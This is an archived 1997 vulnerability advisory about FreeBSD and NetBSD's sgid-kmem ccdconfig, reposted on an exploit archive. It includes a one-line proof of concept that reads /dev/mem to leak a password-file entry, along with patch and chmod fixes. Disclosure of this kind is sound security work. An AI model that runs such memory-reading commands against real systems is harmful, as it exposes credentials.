TUCoPS :: BSD :: bsdccdcf.txt

ccdconfig sgid kmem exploit

Date: Wed, 31 Dec 1997 02:02:31 +0000
From: Niall Smart <rotel@INDIGO.IE>
Subject: Vulnerability in ccdconfig


FreeBSD and NetBSD's ccdconfig doesn't do proper checking of the
argument to -f:

[nsmart@ginseng ~]$ ccdconfig -U -f /dev/mem 2>&1 | strings | grep Charlie
root:iDeLeTeDiT:0:0::0:0:Charlie: No such file or directory

I had to cat /etc/master.passwd in another window to get this to
work though :) So perhaps its not very easily exploitable, but
is worth fixing nonetheless.

This bug was also spotted by olivier@secnet.com and fixed in OpenBSD
some time ago.


 * FreeBSD and NetBSD have been notified of the problem and have fixed
   it in their source tree's as of yesterday  (FreeBSD-current,
   FreeBSD-stable, NetBSD-current)  Retrieve the patched ccdconfig.c
   and compile yourself a new ccdconfig.

 * "chmod g-s /sbin/ccdconfig". I can't think of any reason for it to be
   sgid kmem.



                               More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
 All OS's           Linux     Solaris/SunOS Micro$oft
 *BSD               Macintosh AIX           IRIX
 ULTRIX/Digital UNIXHP/UX     SCO           Remote exploits

This page is part of Fyodor's exploit world. Please do not steal it. For a
free program to automate s 92 canning your network for vulnerable hosts and
services, check out my network mapping tool, nmap. 0

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH